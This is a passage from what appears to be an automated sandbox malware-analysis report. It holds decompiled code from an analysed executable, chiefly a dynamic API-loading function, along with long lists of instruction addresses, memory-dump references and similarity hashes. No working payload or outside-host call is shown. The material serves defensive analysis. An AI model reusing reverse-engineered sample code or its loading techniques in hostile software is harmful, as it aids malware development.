								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406131
                                                                                                                        0x00406136
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a6
                                                                                                                        0x004067ac
                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00406813
                                                                                                                        0x00406813
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x004067ee
                                                                                                                        0x004067ee
                                                                                                                        0x004067f2
                                                                                                                        0x004069a1
                                                                                                                        0x00000000
                                                                                                                        0x004069a1
                                                                                                                        0x004067fe
                                                                                                                        0x00406805
                                                                                                                        0x0040680d
                                                                                                                        0x00406810
                                                                                                                        0x00000000
                                                                                                                        0x00406810
                                                                                                                        0x00406138
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00406374
                                                                                                                        0x00406374
                                                                                                                        0x00406377
                                                                                                                        0x0040637a
                                                                                                                        0x0040637d
                                                                                                                        0x00406380
                                                                                                                        0x00406383
                                                                                                                        0x00406386
                                                                                                                        0x00406389
                                                                                                                        0x0040638c
                                                                                                                        0x00406392
                                                                                                                        0x004063aa
                                                                                                                        0x004063ad
                                                                                                                        0x004063b0
                                                                                                                        0x004063b3
                                                                                                                        0x004063b3
                                                                                                                        0x004063b6
                                                                                                                        0x004063bc
                                                                                                                        0x00406394
                                                                                                                        0x00406394
                                                                                                                        0x0040639c
                                                                                                                        0x004063a1
                                                                                                                        0x004063a3
                                                                                                                        0x004063a5
                                                                                                                        0x004063a5
                                                                                                                        0x004063c6
                                                                                                                        0x004063c9
                                                                                                                        0x0040636c
                                                                                                                        0x00406372
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004063cb
                                                                                                                        0x00406347
                                                                                                                        0x0040634b
                                                                                                                        0x00406953
                                                                                                                        0x00000000
                                                                                                                        0x00406953
                                                                                                                        0x00406351
                                                                                                                        0x00406354
                                                                                                                        0x00406357
                                                                                                                        0x0040635b
                                                                                                                        0x0040635e
                                                                                                                        0x00406364
                                                                                                                        0x00406366
                                                                                                                        0x00406366
                                                                                                                        0x00406369
                                                                                                                        0x00000000
                                                                                                                        0x00406369
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00406207
                                                                                                                        0x00406207
                                                                                                                        0x0040620b
                                                                                                                        0x0040620e
                                                                                                                        0x00406211
                                                                                                                        0x00406214
                                                                                                                        0x00406217
                                                                                                                        0x00406218
                                                                                                                        0x0040621b
                                                                                                                        0x0040621d
                                                                                                                        0x00406223
                                                                                                                        0x00406226
                                                                                                                        0x00406229
                                                                                                                        0x0040622c
                                                                                                                        0x0040622f
                                                                                                                        0x00406235
                                                                                                                        0x00406251
                                                                                                                        0x00406254
                                                                                                                        0x00406257
                                                                                                                        0x0040625a
                                                                                                                        0x00406261
                                                                                                                        0x00406267
                                                                                                                        0x0040626b
                                                                                                                        0x00406237
                                                                                                                        0x00406237
                                                                                                                        0x0040623b
                                                                                                                        0x00406243
                                                                                                                        0x00406248
                                                                                                                        0x0040624a
                                                                                                                        0x0040624c
                                                                                                                        0x0040624c
                                                                                                                        0x00406275
                                                                                                                        0x00406278
                                                                                                                        0x004061ef
                                                                                                                        0x004061ef
                                                                                                                        0x004061f5
                                                                                                                        0x004062a8
                                                                                                                        0x004062ae
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004062b0
                                                                                                                        0x004062b3
                                                                                                                        0x004062b6
                                                                                                                        0x004062b9
                                                                                                                        0x004062bc
                                                                                                                        0x004062bf
                                                                                                                        0x004062c2
                                                                                                                        0x004062c5
                                                                                                                        0x004062c8
                                                                                                                        0x004062ce
                                                                                                                        0x004062e6
                                                                                                                        0x004062e9
                                                                                                                        0x004062ec
                                                                                                                        0x004062ef
                                                                                                                        0x004062ef
                                                                                                                        0x004062f2
                                                                                                                        0x004062f8
                                                                                                                        0x004062d0
                                                                                                                        0x004062d0
                                                                                                                        0x004062d8
                                                                                                                        0x004062dd
                                                                                                                        0x004062df
                                                                                                                        0x004062e1
                                                                                                                        0x004062e1
                                                                                                                        0x00406302
                                                                                                                        0x00406305
                                                                                                                        0x00406283
                                                                                                                        0x00406287
                                                                                                                        0x00406947
                                                                                                                        0x00000000
                                                                                                                        0x00406947
                                                                                                                        0x0040628d
                                                                                                                        0x00406290
                                                                                                                        0x00406293
                                                                                                                        0x00406297
                                                                                                                        0x0040629a
                                                                                                                        0x004062a0
                                                                                                                        0x004062a2
                                                                                                                        0x004062a2
                                                                                                                        0x004062a5
                                                                                                                        0x004062a5
                                                                                                                        0x00406305
                                                                                                                        0x0040630c
                                                                                                                        0x0040630c
                                                                                                                        0x0040630c
                                                                                                                        0x00406310
                                                                                                                        0x00406310
                                                                                                                        0x00406313
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x004064dc
                                                                                                                        0x004064dc
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406201
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040627e
                                                                                                                        0x004061ca
                                                                                                                        0x004061ce
                                                                                                                        0x0040693b
                                                                                                                        0x004069b7
                                                                                                                        0x004069bf
                                                                                                                        0x004069c6
                                                                                                                        0x004069c8
                                                                                                                        0x004069cf
                                                                                                                        0x004069d3
                                                                                                                        0x004069d3
                                                                                                                        0x004061d4
                                                                                                                        0x004061d7
                                                                                                                        0x004061da
                                                                                                                        0x004061de
                                                                                                                        0x004061e1
                                                                                                                        0x004061e7
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061ec
                                                                                                                        0x00000000
                                                                                                                        0x004061ec
                                                                                                                        0x00406278
                                                                                                                        0x00406181
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fbe
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000
                                                                                                                        0x004069cc
                                                                                                                        0x00405fc4
                                                                                                                        0x00000000
                                                                                                                        0x00405fcf
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fd8
                                                                                                                        0x00405fdb
                                                                                                                        0x00405fde
                                                                                                                        0x00405fe2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fe8
                                                                                                                        0x00405feb
                                                                                                                        0x00405fed
                                                                                                                        0x00405fee
                                                                                                                        0x00405ff1
                                                                                                                        0x00405ff3
                                                                                                                        0x00405ff4
                                                                                                                        0x00405ff6
                                                                                                                        0x00405ff9
                                                                                                                        0x00405ffe
                                                                                                                        0x00406003
                                                                                                                        0x0040600c
                                                                                                                        0x0040601f
                                                                                                                        0x00406022
                                                                                                                        0x0040602e
                                                                                                                        0x00406056
                                                                                                                        0x00406058
                                                                                                                        0x00406066
                                                                                                                        0x00406066
                                                                                                                        0x0040606a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x0040605a
                                                                                                                        0x0040605d
                                                                                                                        0x0040605e
                                                                                                                        0x0040605e
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x00406034
                                                                                                                        0x00406039
                                                                                                                        0x00406039
                                                                                                                        0x00406042
                                                                                                                        0x0040604a
                                                                                                                        0x0040604d
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406070
                                                                                                                        0x00406070
                                                                                                                        0x00406074
                                                                                                                        0x00406920
                                                                                                                        0x00000000
                                                                                                                        0x00406920
                                                                                                                        0x0040607d
                                                                                                                        0x0040608d
                                                                                                                        0x00406090
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406096
                                                                                                                        0x0040609a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040609c
                                                                                                                        0x004060a2
                                                                                                                        0x004060cc
                                                                                                                        0x004060d2
                                                                                                                        0x004060d9
                                                                                                                        0x00000000
                                                                                                                        0x004060d9
                                                                                                                        0x004060a8
                                                                                                                        0x004060ab
                                                                                                                        0x004060b0
                                                                                                                        0x004060b0
                                                                                                                        0x004060bb
                                                                                                                        0x004060c3
                                                                                                                        0x004060c6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040610b
                                                                                                                        0x00406111
                                                                                                                        0x00406114
                                                                                                                        0x00406121
                                                                                                                        0x00406129
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004060e0
                                                                                                                        0x004060e0
                                                                                                                        0x004060e4
                                                                                                                        0x0040692f
                                                                                                                        0x00000000
                                                                                                                        0x0040692f
                                                                                                                        0x004060f0
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fe
                                                                                                                        0x00406101
                                                                                                                        0x00406104
                                                                                                                        0x00406109
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004063d0
                                                                                                                        0x004063d4
                                                                                                                        0x004063f2
                                                                                                                        0x004063f5
                                                                                                                        0x004063fc
                                                                                                                        0x004063ff
                                                                                                                        0x00406402
                                                                                                                        0x00406405
                                                                                                                        0x00406408
                                                                                                                        0x0040640b
                                                                                                                        0x0040640d
                                                                                                                        0x00406414
                                                                                                                        0x00406415
                                                                                                                        0x00406417
                                                                                                                        0x0040641a
                                                                                                                        0x0040641d
                                                                                                                        0x00406420
                                                                                                                        0x00406420
                                                                                                                        0x00406425
                                                                                                                        0x00000000
                                                                                                                        0x00406425
                                                                                                                        0x004063d6
                                                                                                                        0x004063d9
                                                                                                                        0x004063dc
                                                                                                                        0x004063e6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040643a
                                                                                                                        0x0040643e
                                                                                                                        0x00406461
                                                                                                                        0x00406464
                                                                                                                        0x00406467
                                                                                                                        0x00406471
                                                                                                                        0x00406440
                                                                                                                        0x00406440
                                                                                                                        0x00406443
                                                                                                                        0x00406446
                                                                                                                        0x00406449
                                                                                                                        0x00406456
                                                                                                                        0x00406459
                                                                                                                        0x00406459
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040647d
                                                                                                                        0x00406481
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406487
                                                                                                                        0x0040648b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406491
                                                                                                                        0x00406493
                                                                                                                        0x00406497
                                                                                                                        0x00406497
                                                                                                                        0x0040649a
                                                                                                                        0x0040649e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064ee
                                                                                                                        0x004064f2
                                                                                                                        0x004064f9
                                                                                                                        0x004064fc
                                                                                                                        0x004064ff
                                                                                                                        0x00406509
                                                                                                                        0x00000000
                                                                                                                        0x00406509
                                                                                                                        0x004064f4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406515
                                                                                                                        0x00406519
                                                                                                                        0x00406520
                                                                                                                        0x00406523
                                                                                                                        0x00406526
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x00406529
                                                                                                                        0x0040652c
                                                                                                                        0x0040652f
                                                                                                                        0x0040652f
                                                                                                                        0x00406532
                                                                                                                        0x00406535
                                                                                                                        0x00406538
                                                                                                                        0x00406538
                                                                                                                        0x0040653b
                                                                                                                        0x00406542
                                                                                                                        0x00406547
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004065d5
                                                                                                                        0x004065d5
                                                                                                                        0x004065d9
                                                                                                                        0x00406977
                                                                                                                        0x00000000
                                                                                                                        0x00406977
                                                                                                                        0x004065df
                                                                                                                        0x004065e2
                                                                                                                        0x004065e5
                                                                                                                        0x004065e9
                                                                                                                        0x004065ec
                                                                                                                        0x004065f2
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f7
                                                                                                                        0x004065fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406658
                                                                                                                        0x00406658
                                                                                                                        0x0040665c
                                                                                                                        0x00406983
                                                                                                                        0x00000000
                                                                                                                        0x00406983
                                                                                                                        0x00406662
                                                                                                                        0x00406665
                                                                                                                        0x00406668
                                                                                                                        0x0040666c
                                                                                                                        0x0040666f
                                                                                                                        0x00406675
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x0040667a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406428
                                                                                                                        0x00406428
                                                                                                                        0x0040642b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406767
                                                                                                                        0x0040676b
                                                                                                                        0x0040678d
                                                                                                                        0x00406790
                                                                                                                        0x0040679a
                                                                                                                        0x00000000
                                                                                                                        0x0040679a
                                                                                                                        0x0040676d
                                                                                                                        0x00406770
                                                                                                                        0x00406774
                                                                                                                        0x00406777
                                                                                                                        0x00406777
                                                                                                                        0x0040677a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406824
                                                                                                                        0x00406828
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x0040684d
                                                                                                                        0x00406854
                                                                                                                        0x0040685b
                                                                                                                        0x0040685b
                                                                                                                        0x00000000
                                                                                                                        0x0040685b
                                                                                                                        0x0040682a
                                                                                                                        0x0040682d
                                                                                                                        0x00406830
                                                                                                                        0x00406833
                                                                                                                        0x0040683a
                                                                                                                        0x0040677e
                                                                                                                        0x0040677e
                                                                                                                        0x00406781
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406915
                                                                                                                        0x00406918
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040654f
                                                                                                                        0x00406551
                                                                                                                        0x00406558
                                                                                                                        0x00406559
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406566
                                                                                                                        0x00406569
                                                                                                                        0x0040656c
                                                                                                                        0x0040656e
                                                                                                                        0x00406570
                                                                                                                        0x00406570
                                                                                                                        0x00406571
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406899
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00000000
                                                                                                                        0x0040690d
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc
                                                                                                                        0x004064bf
                                                                                                                        0x004064c2
                                                                                                                        0x004064c5
                                                                                                                        0x004064c8
                                                                                                                        0x004064c9
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064ce
                                                                                                                        0x004064d1
                                                                                                                        0x004064d4
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064da
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                        • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                                        • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                        • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                                        0x00405e90
                                                                                                                        0x00405e93
                                                                                                                        0x00405e9a
                                                                                                                        0x00405ea2
                                                                                                                        0x00405eaf
                                                                                                                        0x00000000
                                                                                                                        0x00405eb6
                                                                                                                        0x00405ea5
                                                                                                                        0x00405ead
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405ebe

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 310444273-0
                                                                                                                        • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                        • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                                        • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                        • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004036AF, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                        Download Yara Rule
